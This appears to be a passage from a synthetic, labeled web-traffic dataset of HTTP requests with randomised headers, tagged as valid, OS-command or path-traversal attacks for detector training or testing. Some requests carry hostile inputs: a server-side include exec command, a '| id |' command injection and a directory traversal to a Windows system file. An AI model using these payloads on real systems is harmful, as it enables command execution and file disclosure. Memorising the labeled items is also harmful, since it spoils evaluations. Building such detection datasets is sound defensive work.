GET /erptusw3rdp.mdb?iHiepqhOb=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5C0t6reN%5ClLcoLnua%5Cyn.exe+++d%3A%5Caere%5Cwww.nsinis.org%5CsarpkD%5Cdatabase.mdb++%2Fx+++++exporttofoxpro%22--%3E&hmn=eOoucs0uniona4Tha HTTP/1.0
Host: www.9sra.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, identity, deflate
Accept-Language: *
Cookie: cnhciae=rbb3YwLR;sh6ylte7stebtlz=svopeni;fwDuon=oreo
Cookie2: $Version="90"
Date: Mon, 21 Mar 05 15:17:00 CET
ETag: "Y_FanZdQrXrmiFy"
If-Modified-Since: Sat, 28 May 05 22:56:54 GMT
If-None-Match: *
Max-Forwards: 4
Authorization: Basic aWExbm5OZjpsZWxm
Referer: http://atsls.net/uedeoo/parij52F/xthsg.msf
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 0.9; 6k-ma; rv:3.7.1) Gecko/77169147
UA-Color: color8
UA-Pixels: 4806x485
Via: FTP/7.8 www.pnfraEI.shtml, Selxa/8.5 www.si5hcijr.html, HTTP/7.2 www.hmi2Vd.js
Transfer-Encoding: gzip
----: ------------------------------

null

End - Id: 36385
Start - Id: 22008
class: Valid
GET /ox-B/9.U2@BQ2n9eTA@g/8QUKByiX2qGto/s4/uivAzSB4MTMZ@/tQ6KV8CIfRR8QJJV/ktr5clls/jOtmpiU33v0a/DlocationoE/cpGFLR/Tbs/gifttHwaswa9M.shtml?C0=E%3Ftelnet&bttl=12777&eetht4lnracLt=83&axeprtli9=391088&ire09=4968430&yooia0qb3lcaoi=0968270&dw=334649&niS0netjtPeaR=connecty5&tnutoXona=8096176&j7send=opeivasLsyetivu&o2phail=mKuu7N HTTP/1.1
Host: 14.92.253.60
Connection: rerorkt
Accept: video/*, text/*;q=0.9, video/*;q=0.8
Accept-Charset: iso-8859-1, iso-8859-6
Accept-Encoding: *;q=0.8
Accept-Language: nllmernv-ttsre;q=0.4, oe8-gl, e0t5ttsh-aOcrnEt;q=0.2, mjgeg-ddevl
Cache-Control: min-fresh=006
Client-ip: 166.123.70.154
Cookie: tv7Hocehi=rotmp2iezlicatd2E i[Hinull
Cookie2: $Version="91"
Date: Mon, 21 Jul 08 20:24:00 UTC
ETag: W/"y@a9fTus_RQlTN96"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Tue, 09 Oct 07 03:25:14 CET
If-Unmodified-Since: Sun, 09 Nov 08 13:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic b2ROb2V2Om9sYTc=
Authorization: NTLM NW9pbGFpcjV0aW9kMzZ2dng1N0wwNEFlNmhlZGRub3ZtYThyOGdvdHNh
Range: 048-5458,87200-
Referer: http://geuAip.cz/a7cdn/utevie.pl
TE: gzip;q=0.8
Trailer: Expect
User-Agent: csei (2yOBKtjh)
UA-CPU: Sparc
UA-Disp: 514,290,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3071x562
Via: FTP/5.1 www.xlhan.js
Transfer-Encoding: deflate
Upgrade: pufgp/8.1, Wcil/8.8
Warning: 409 www.rklthno.jpeg "2gidteht4e3rseoOd" 
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 920022590702
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22008
Start - Id: 11623
class: Valid
GET /tY72IoSU9zinait.cfm? HTTP/1.1
Host: 102.184.110.91
Connection: n2aoe
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312, ks_c_5601-1987;q=0.7, iso-8859-7, x-mac-arabic, x-mac-arabic;q=0.9
Accept-Encoding: *
Accept-Language: ui-fexs6;q=0.0, t848abn-sh
Cache-Control: no-cache
Client-ip: 95.90.20.151
Cookie: pedp2odmhljs=tihRt5elhoehjiZk;DK8Y=bodyngt+ysedea;YWFM=@Z$https(;rto=025911
Cookie2: $Version="139"
Date: Sat, 01 Jan 05 02:03:58 CET
ETag: "kw8.f_EtoF.PUUa"
Expect: nEilt=1aoi;efzenrhp
From: llde@xop7tnntt.de
If-Modified-Since: Tue, 12 Sep 06 13:09:52 CET
If-Unmodified-Since: Tue, 08 May 07 17:20:04 UTC
If-Match: *
If-None-Match: "CY7J5D1mgLwHweip_VY"
If-Range: "89w7K2J3g0L2qYx9-UyU"
Max-Forwards: 874
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM YWViczBoc2F5cFVvaWxidGl1ZWVpYW9yYW5la2lpZW9ra2FscGk=
Authorization: ihoeTo M9ttet=ta1fng
Range: 4-343448,-16531
Referer: http://nEqail4u.net/wgiy/f48b/ntieel.avi
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/1.2 (X11; U; Solaris 4.2; aa-ac; rv:0.2.9) Gecko/21351239
UA-CPU: x86
UA-Disp: 3478,401,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3585x2586
Via: FTP/7.0 www.saUutti.png, FTP/9.2 72.184.134.255, FTP/8.9 60.170.225.219
Transfer-Encoding: compress
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 44.159.255.205
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11623
Start - Id: 25206
class: Valid
GET /oPoF/pLJOgvPOTR32qNF1-9dq/h121/ihri6.dll?Uhdhtvaz=yfUbcY-8&iiwutqleuhec=c+mh%3FL+no+is&bchr=sZ&7eaassIrro=5&nnh=L+Ha%25&trt9igyoOs=s%29h&ldtane=oqZodD.O&1.BrNr=383384&tle=cgyyyarfftndtfR HTTP/1.1
Host: 114.168.2.49
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: uva-nhu;q=0.0, snrNe-sy;q=0.9, pe0le-ddIgseep;q=0.8, eui1r-mot1
Cache-Control: only-if-cached
Client-ip: 41.95.155.11
Cookie: od98Vhrhlne3l=do;wnichwIfmr=ro;szehzrlun=sToa;enpheod=ahMntlbd8Iez;sew=617598
Cookie2: $Version="8"
Date: Fri, 08 Oct 04 16:42:40 UTC
ETag: "q9BvBsmK@35ZBtE99Y"
Expect: eqqtg
From: f4jyigtN@wdnsEa.uk
If-Modified-Since: Fri, 03 Jul 09 01:25:48 GMT
If-Unmodified-Since: Thu, 28 Aug 08 19:00:51 GMT
If-Match: "W0OOVUAkf_pzv3lSU"
If-None-Match: "GfkZGM2S7MdvkF1i"
If-Range: "fc2iuws.VHjhFubJ"
Max-Forwards: 930
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic b3RzYWl0RWE6c2VzYWRh
Authorization: Digest username="ayl3"
Range: 00979-677,969790-,010-
Referer: /cbehrc/thieNZse/eh6dpe.cgi
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/9.5 (X11; U; Linux i386 1.8; 8z-oA; rv:0.3.5) Gecko/44158103
UA-CPU: x86
UA-Disp: 334,5908,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3634x3185
Via: 7.8 www.abqAh.png, 3.4 160.101.123.141, 0.2 150.27.144.159
Transfer-Encoding: deflate
Upgrade: en6mi/1.2, pYie/2.8, 2tts/2.9, 7e6Es/2.9, etyr/8.1
Warning: 324 www.hoohl.html:890 "deeeTetsgan" "Sat, 03 Dec 05 12:00:06 CET"
X-Forwarded-For: 243.124.209.190
X-Serial-Number: 39906730696975900354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 25206
Start - Id: 30113
class: Valid
GET /vGhj53JhQ/lohd.nsf?oLaGform0orTOB=9587&rvEVDlsl7d=34&wit2evitoieit7a=u6p&eht=Reenetcat%2B&nvciahre0EsOg=0&4evsa9ui8twee=3035198&anrivnEte=43318840&en7iTmy=+se+drrtaEhpznr&ds5etot=bnode0gi5Qdea&ej=t+da%5C&ENmtr=0908&xLsbsu=bw8o&Ug-M=9096469 HTTP/1.1
Host: 231.143.58.235
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=88
Client-ip: 66.154.126.17
Cookie: 63ddjo5l5h3=asystemdrop
Cookie2: $Version="0"
Date: Tue, 30 Sep 08 07:29:23 GMT
ETag: "r1jtsqj1MClaap3WG92"
Expect: 100-continue
From: iustaSag@Odyltrr.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Mon, 29 Jan 07 04:15:01 CET
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: "Sj7@kX9HZ3V.3jGys4"
If-Range: Tue, 01 Jul 08 02:42:34 GMT
Max-Forwards: 0446
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: tofin fxTiist=4hqeat
Range: -3400,603295-
Referer: /uslSghs/rgbx/oots/mcrae8sh.exe
TE: gzip
Trailer: Date
User-Agent: eQpmo7HJQ http://www.ihmlu.net
UA-CPU: 68000
UA-Disp: 0585,478,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 118x9358
Via: HTTP/4.7 111.66.145.240, 0.1 42.231.113.254
Transfer-Encoding: deflate
Upgrade: enzrs/5.1, hn0/2.2
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 131299472861769232
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30113
Start - Id: 5866
class: Valid
POST /unionBqGSSrnRT/wGUHeY3wA0P-6/XV/6U4oLu8C_p/enlh36OgusTs0nuels/abaeomntceetnauc4Oei/sldNoaxouh/nRPVfAE9uR1foL2pRW6.sh? HTTP/1.1
Content-Length: 21
Content-Language: heiUcTo,p8ltsbe
Content-Encoding: compress
Content-Location: http://www.ttjp.uk/exeiah.mp3
Content-MD5: ZmdydHRpY3BxMnNvdDdyYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 May 08 02:43:23 UTC
Last-Modified: Tue, 06 Jul 04 01:21:41 UTC
Host: 146.209.6.6
Connection: close
Accept: video/quicktime;q=0.4, image/*;q=0.0, audio/*;q=0.1
Accept-Charset: gb2312;q=0.2, x-mac-arabic, iso-8859-15;q=0.2, koi8;q=0.1, euc-cn
Accept-Encoding: identity;q=0.5, deflate
Accept-Language: t4w1ma-iH, hnanSl1-ase, Exeei-id, oroh-ad
Cache-Control: no-transform
Client-ip: 49.110.142.226
Cookie: rensoi=8098452;Bt=65srra7oimasyouns
Cookie2: $Version="744"
Date: Sat, 03 Apr 10 23:43:06 CET
ETag: W/"Ve3Wvlxgpmc8WmG-exb"
Expect: 100-continue
From: mOr4g@othliluhnF.org
If-Modified-Since: Tue, 06 Jan 04 06:56:58 CET
If-Unmodified-Since: Thu, 02 Apr 09 03:07:28 GMT
If-Match: *
If-None-Match: "AwS9a@ygJ6dGs1O"
If-Range: *
Max-Forwards: 81
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest username="cubArear"
Authorization: rSzo idrcenee=fxcr
Range: -6274
Referer: /phha8/ZottrUss/iocDa7/whrayte.zip
TE: gzip;q=0.9,chunked,trailers
Trailer: Host
User-Agent: impcetikP90re7cdwDlE
UA-CPU: x86
UA-Disp: 8384,023,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 621x973
Via: HTTP/6.0 www.inspuo0.html
Transfer-Encoding: identity
Upgrade: s1neag/4.4, nah/9.2, 0ttsng/4.2, eate/2.9, Har/6.9
Warning: 461 www.kolsrwda.shtml "3KdrrzenriiekwaieN" 
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s9=crmeooshdmSijttDoh

End - Id: 5866
Start - Id: 26818
class: Valid
GET /Howe/e6qHlrPDqCJoDyl3Vj.jpg?xavo=+lwp-idntC+%3Bufj%3D9 HTTP/1.1
Host: www.F6set.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ezr-ngrb;q=0.5, naNsi-lnsj0;q=0.2
Cache-Control: min-fresh=15
Client-ip: 91.122.72.121
Cookie: 8b6rC2irag0dt=bfnetgct5eidRa7;tt=h8t;netps3=oat+ 9arE;BSixeenuauEo=a6gw0eeZxternun
Cookie2: $Version="65"
Date: Fri, 23 Jan 04 04:10:07 GMT
ETag: W/"wNLalob.EA8zuJC45_"
Expect: 100-continue
From: 4ahee@onawd.st
If-Modified-Since: Wed, 12 May 04 10:09:12 CET
If-Unmodified-Since: Tue, 07 Jul 09 20:10:07 CET
If-Match: "s0W.sdL57pYLL25"
If-None-Match: *
If-Range: Fri, 24 Mar 06 05:53:20 GMT
Max-Forwards: 91
MIME-Version: 1.2
Pragma: hSy=Rrmnce
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 65405-,6-
Referer: http://tthblw2j.gov/Cista/6isc/tdou/s5n2ee/erimtias.aspx
TE: deflate;q=0.3
Trailer: TE
User-Agent: Mozilla/8.0 (X11; U; Solaris 1.9; 7r-Nr; rv:4.5.0) Gecko/64766383
UA-CPU: StrongARM
UA-Disp: 119,955,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 8583x639
Via: FTP/5.8 www.gOilxsrn.shtml:46620, 4.2 153.96.22.24:299, Atxa/1.7 96.119.2.50:7142
Transfer-Encoding: gzip
Upgrade: opiEo/2.6, i3n5Ve/7.1
Warning: 383 175.152.228.184 "eys2eafva7omc5ita" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 51104
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 26818
Start - Id: 36782
class: OsCommanding
GET /ah6szgudi/dNfm_S.png?dnOurastp3r=1580&Mtfkn=5eqrsrernt&ttseondrtstot=AE+ro4hlocationouInhnode&dsvrae=t%25deg%2Ba+eJ&oiloR=%7C++++id+++%7C&stl5=1ms&TnddetspO6e=nhH&seShlvadhli=e8K&Aqtqts6gt8osLga=454489449&@OLMPAlpPyB=354230 HTTP/1.1
Host: 72.27.185.17:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eooasas-ab8Ste
Cache-Control: only-if-cached
Client-ip: 183.149.193.186
Cookie: Loas1aB=driej;loYC6SjoprhE=ld.Tj2E
Cookie2: $Version="60"
Date: Sun, 01 Jun 08 12:53:58 UTC
ETag: W/"09GvkQ2HrUPf.JiKF"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 14 Mar 04 10:39:25 GMT
If-Unmodified-Since: Thu, 19 Jul 07 09:10:19 UTC
If-Match: *
If-None-Match: "XidTsYtibPuSdSM"
If-Range: Fri, 28 Aug 09 09:17:40 UTC
Max-Forwards: 016
MIME-Version: 5.1
Pragma: a2ign=ct
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: wyboL acphzxa=ieoTe
Range: 907-5,-807
Referer: http://uA5qm.fr/skHSNsbz/djtMeme.css
TE: trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: ciltjiw7to (xAOBVao6d)
UA-CPU: MIPS
UA-Disp: 8446,438,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 069 241.153.203.196 "ds96bdaie" "Mon, 05 May 08 12:27:37 UTC"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36782
Start - Id: 22947
class: Valid
GET /tumat/c4yL/mjrgafer/Uo7YWo7ywinntwl.dll? HTTP/1.1
Host: 41.200.233.70
Connection: keep-alive
Accept: text/xml;q=0.8
Accept-Charset: utf-8;q=0.4, iso-8859-7;q=0.5, x-mac-chinesetrad;q=0.7, iso-8859-15;q=0.1, koi8-r;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: njtior6c='peokniv'
Client-ip: 79.7.34.194
Cookie: seretpEYuAe=64276;vknhLdoitDtilh=f hi9r9ers;pro=nxdtzer
Cookie2: $Version="2"
Date: Tue, 13 Sep 05 11:51:19 CET
ETag: W/"3oxw@HfcW_qjwvOoUw"
Expect: 100-continue
From: wrmcT@heeEiet.org
If-Modified-Since: Sat, 13 Feb 10 14:24:15 UTC
If-Unmodified-Since: Thu, 24 Sep 09 05:58:16 UTC
If-Match: *
If-None-Match: "54aW5mDCX3Q4MUCsXJO"
If-Range: *
Max-Forwards: 52
MIME-Version: 1.1
Pragma: s='temt'
Proxy-Authorization: Digest username="snietTsh"
Authorization: NTLM dnNlbXN3c2thMW5zbmRhZW5ldGVlbnBrZVdkbWVlcmRsMWFnZG9uZXlq
Range: -294148
Referer: /frdtly.pdf
TE: trailers,chunked
Trailer: Pragma
User-Agent: iecTdenmcaesopuAniF
UA-CPU: 68000
UA-Disp: 164,400,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: 4stcm/0.9 75.243.201.129:94136
Transfer-Encoding: no04eB
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 349 167.176.37.95 "eumteoh1rgy6orin" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22947
Start - Id: 6299
class: Valid
PUT /aeieotisrgstten1sb/enmO/aPQfQnH_QfARlcMKD9/gea9lsGtoar9AE.tiff? HTTP/1.0
Content-Length: 212
Content-Language: N,kgu,luecAne7
Content-Encoding: deflate
Content-Location: /1ferarsr.jsp
Content-MD5: bnB4aXNmaFV0dGVtbnlhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Oct 05 12:56:16 CET
Last-Modified: Fri, 20 Feb 09 18:54:43 CET
Host: www.s29ot.com
Connection: heh5e
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: reE-osaMIW, a9iold-riwtawye
Cache-Control: min-fresh=7
Client-ip: 233.232.252.62
Cookie: rmaO=69446940;sTCt4tXa=1353708
Cookie2: $Version="1"
Date: Mon, 29 Jun 09 19:22:59 CET
ETag: W/"CRrlvqSg_oS8jZDr"
Expect: Eyilas=df2aoe
From: eOapi@ngtn7he.gov
If-Modified-Since: Sun, 14 Jun 09 11:05:54 GMT
If-Unmodified-Since: Fri, 22 Dec 06 14:39:51 CET
If-Match: *
If-None-Match: "9mQnD_W5FzyAJA5K7"
If-Range: Tue, 21 Aug 07 01:14:29 GMT
Max-Forwards: 922
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: ut4s fpas=rrsds
Range: 10-,-849357
Referer: http://Idns.it/6nlJ2N.conf
TE: trailers
Trailer: From
User-Agent: vwa2cr3eu (ni1xyX; nTRWGSCB5; r5hOXMa; zhEFz31)
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 475x5862
Via: 4.2 91.181.128.139, 2.6 www.4frv3a.html
Transfer-Encoding: identity
Upgrade: d8e5it/2.2, jr4e/7.0, easd/8.8, rOfnn/0.5, NeOe/4.5
Warning: 155 www.3r0o.gif "onb5edtw" "Tue, 10 Oct 06 03:14:15 UTC"
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@nHs.QcmdS5=40&2gfIueTehEage7t=0287462&we=hle/tnN6b&irbdfcrylhTR=Entw&nftHbbhn3neA=849128&ZB6AdropFZpbek=replacer 3&-mocha3DpassthruI=5es9 Tm3t/t&5einrda6rsm=2oWss6qihhoGllql&5oDmnrrusivgs=9&eMtergoiOa3t=ulrn

End - Id: 6299
Start - Id: 24711
class: Valid
GET /9nae.htm?itr=uIsr&6ee=6373&ixnbAtLf3eoatl=6200&doiicnral=s39H8myaeso&enanNda=953&eaWotItr=oreplacer&etifmroe=2683&Er=f2aLsos7ror&i44rioeuia5gOei=383&mechoLtKhttpsSk=ud&mEFeiFFcahT=92353&yEiud=rr7nhnibumj&Etpnnle2egT=4124&4hanr=coueeoybuLddfoeo HTTP/1.1
Host: www.loeek.biz
Connection: close
Accept: */*
Accept-Charset: big5, iso-8859-8-i;q=0.9, koi8-r, euc-cn
Accept-Encoding: *;q=0.6
Accept-Language: 6-Sa3;q=0.8, asej-hIvoln5;q=0.0, Ahatqs-fbamrn, u7egeDh-Iei;q=0.0, b-sedd
Cache-Control: no-transform
Client-ip: 246.244.195.20
Cookie: nbne6=rchhomeU;ecnPvu1rAmts=t&i;yv9llhgt3rteaib=t74FdDb;8oct=i7peOservicesA
Cookie2: $Version="25"
Date: Sat, 08 Jan 05 11:05:27 UTC
ETag: W/"RhQK9iPTJL@dncaX8C"
Expect: 100-continue
From: erIrtmn@egw1d.net
If-Modified-Since: Mon, 08 Mar 10 03:42:08 UTC
If-Unmodified-Since: Thu, 14 Oct 04 12:51:49 GMT
If-Match: "Lv90q@RbxtG4MeZGMVr"
If-None-Match: *
If-Range: "DS9h_iD1azjt3I0un"
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: uh34 esit6Ac=arreen
Range: 3-
Referer: /ayey5f6a/ntoee/whn9n8.asmx
TE: trailers
Trailer: Date
User-Agent: 4nhxPtsermme36r5fh
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 291x803
Via: 5.1 93.116.113.175, 7.9 102.226.10.74
Transfer-Encoding: 7pbs
Upgrade: noohwb/5.0
Warning: 192 21.187.17.129:7 "hlntoFrmiWedrea" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 7759023411175915
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24711
Start - Id: 31977
class: Valid
GET /sVI4t2/ci5opu/deLB4r7kX1n/7o9sudaub/glN8oeluxmpAdcrEy6/ov0Guzzhd/dHp/s.6QRR8U/sWO9qHh_Tl3oZ/dz2@7LYGV/sCFk8_MuAatGmvGUf/91zSB-d-G-A.asmx?br=lpnuets0edT8&2tRedi=8096102&votco=exLw_801Mmi&bt=skt&enxaatadgsnes=tOWJgHMV-6o&tyAiom=Mi&tektAlfzPO=odm&ehteda2whxh=066386&7foxsaa9s6On=%25%2Btx2insertA%279a%27&1Tgg=juoh&e8f9arUamaos=rbgEi%7Eia+a&artsfato6slp1st=549&nTswtscaepHvd=w+s5soxi2fy%25aexecnetcatt HTTP/1.0
Host: www.hlStro.com
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp, x-mac-arabic;q=0.7, iso-2022-kr;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 171.242.102.144
Cookie: emnnEy=4315;blevalpsrmR=o7le3htpemr6;EcbHe=ErasVc;rIe=hIEuaohMOnA;wft=246
Cookie2: $Version="0"
Date: Sat, 14 Feb 04 21:33:58 CET
ETag: "1H-JyzkXpDmhoGTM"
Expect: ipnsrD=g9nzpz
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 23 Aug 09 16:03:32 GMT
If-Unmodified-Since: Tue, 16 Jan 07 22:47:20 CET
If-Match: "FG@c9WREAju2cSGYukW"
If-None-Match: "5NZTLfsaBehRiypK@"
If-Range: *
Max-Forwards: 06
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: NTLM MHNhaWNPeG9lNDJhc2V0ZWxydDlpYW90bmlvZWhjdGh1b2V6czhDdnhtRDF2
Range: -7
Referer: http://www.ftra.biz/8nav/rsasmdst/alse7bi/lg5o8.php3
TE: gzip,chunked,gzip;q=0.6
Trailer: Date
User-Agent: Mozilla/9.2 (X11; U; Open BSD i586 4.2; ne-ei; rv:5.6.0) Gecko/20058163
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: 4.8 210.59.145.43, FTP/9.3 www.n9ogi.jpg:81776
Transfer-Encoding: identity
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 811726
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31977
Start - Id: 1388
class: Valid
GET /PTU5etweueitLahIR/X1.bin? HTTP/1.1
Host: www.iond.fr
Connection: keep-alive
Accept: audio/*;q=0.8, application/postscript, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 49.160.169.51
Cookie: toa8cidnn=595917;tgsaM=ip3 m;ReK5K=tt0oaanowt;duuh2Xn0rpe9hen=09997272;ssSttmDeatariu=;selectwwp-elog upn2esboot.inig:0;eempaohfgf4t=tmpimmFskt2w
Cookie2: $Version="13"
Date: Sat, 14 May 05 03:36:19 CET
ETag: W/"TZsPQKpbsqY2GON"
Expect: 100-continue
From: 4a8k@ilaedTEuh.net
If-Modified-Since: Mon, 18 Jul 05 02:33:33 GMT
If-Unmodified-Since: Wed, 16 Jan 08 10:41:12 UTC
If-Match: *
If-None-Match: "krm-@in@X8nG8yITgj"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.1
Pragma: pieojr9t=2aoA
Proxy-Authorization: peo1 et1n=eacseu
Authorization: NTLM c2UxTHVsczc4bmlua3NwdGhma2k3aXVMcjlMbWVjZUVqeGRzTmVk
Range: 373155-704,-1740,72564-298
Referer: /0dsc.png
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: nfepkwfo
UA-CPU: x86
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 238x900
Via: FTP/9.6 www.UtxwelNw.css, HTTP/0.5 www.leD1.css
Transfer-Encoding: gAut
Upgrade: rc0t/5.9, Dryoo/4.4, rgtOis/7.1
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1388
Start - Id: 45830
class: PathTransversal
GET /s2CTJk/9ewarMaen3.jsp?nperlcvE8v=e-k2-kBHd&deum7tl=45784&qluiaes=au&orrtrM1ee=3eOtah%28di%25utkaiae&rSsock_streamys9XEqp=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: 78.182.56.200:825
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 222.47.112.199
Cookie: ajtajotb=85;aawqbdEMD=nhtacces@;jahh9nt=fn2l6eiR;nnue=oxDA@41P.X4c
Cookie2: $Version="38"
Date: Sun, 11 Jul 04 23:54:20 UTC
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Sat, 26 May 07 01:41:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: maar j1ewnj=rafG2
Range: 09236-
Referer: http://www.hf4ges.org/exqoipan/it0n/eeLs/wuctPtts/apntfa7m.php
TE: chunked,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (Windows; U; Windows NT 4.3; ey-eE; rv:9.7.3) Gecko/04363372
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 1524x385
Via: HTTP/5.5 www.hnrenne.png, FTP/9.9 www.0mda.jpeg:63542
Transfer-Encoding: compress
Upgrade: osu6/8.7, l2hene/7.8, eas/3.6, aeor6c/3.1
Warning: 559 www.tI7c.css "nAtao" 
X-Serial-Number: 25397478987579
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45830
Start - Id: 44923
class: PathTransversal
